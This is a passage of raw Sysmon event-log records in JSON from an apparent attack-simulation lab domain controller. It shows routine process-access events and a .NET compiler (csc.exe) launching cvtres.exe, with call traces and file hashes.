0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:09.908\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010BFA10700}\r\nSourceProcessId: 4376\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nTargetProcessId: 4284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:09.908","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010BFA10700}","SourceProcessId":"4376","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20CD-5F25-0000-0010E7C40700}","TargetProcessId":"4284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.014\r\nProcessGuid: {41C8662E-20CE-5F25-0000-00100EC90700}\r\nProcessId: 4896\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESA7D0.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC19EFE4B7967140F8AE177A984D6DF57E.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nParentProcessId: 4284\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p5sz5phd.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.014","ProcessGuid":"{41C8662E-20CE-5F25-0000-00100EC90700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESA7D0.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC19EFE4B7967140F8AE177A984D6DF57E.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20CD-5F25-0000-0010E7C40700}","ParentProcessId":"4284","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p5sz5phd.cmdline\"","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-20CD-5F25-0000-0010E7C40700}\r\nSourceProcessId: 4284\r\nSourceThreadId: 3056\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-00100EC90700}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 